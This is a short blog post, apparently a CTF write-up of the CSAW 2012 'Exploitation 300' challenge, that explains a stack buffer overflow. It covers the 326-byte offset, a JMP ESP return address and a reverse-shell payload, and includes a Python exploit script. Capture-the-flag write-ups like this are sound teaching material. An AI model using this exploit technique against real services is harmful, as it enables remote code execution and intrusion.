Sunday, September 30, 2012

CSAW CTF Quals: Exploitation 300

This one was interesting because it was all in Chinese (according to Google Translate). So we set up the binary on a local machine and got cracking. We ran some of the strings of Chinese through Google Translate and got the string "This part is not difficult, but I hope you have fun. If you give me a large amount of data, it may be a bad thing will happen." So we sent it a lot of stuff. And it broke.

We attached to the process with gdb and sent the program a pattern so we could figure out the offset of the return address we were overwriting and got an offset of 326 bytes. Now to figure out what to return to.

Turns out that the stack was executable and there was a convenient 'JMP ESP' sittin' around at address 0x08048F47, so we overwrote the return address with the jmp esp and then popped in some nice reverse_tcp shellcode and won! Our is posted below.
import socket, binascii

# For our pattern generator
#alph = 'abcefghijklmnopqrstuvwxyz'

def recv(s):
        print s.recv(1024)

def endian(s):
 if len(s) < 8:
  s = s.zfill(8)
 return s[6:8]+s[4:6]+s[2:4]+s[0:2]

s = socket.socket()
s.connect(('', 4842))

win = 'a'*326
win += binascii.unhexlify(endian('08048f47')) 
win += open('payload').read()+'\n'

# A simple pattern generator
#for i in alph:
# for j in range(0,10):
#  breaker += i + str(j)

print win, len(win)

  -- suntzu_II

No comments:

Post a Comment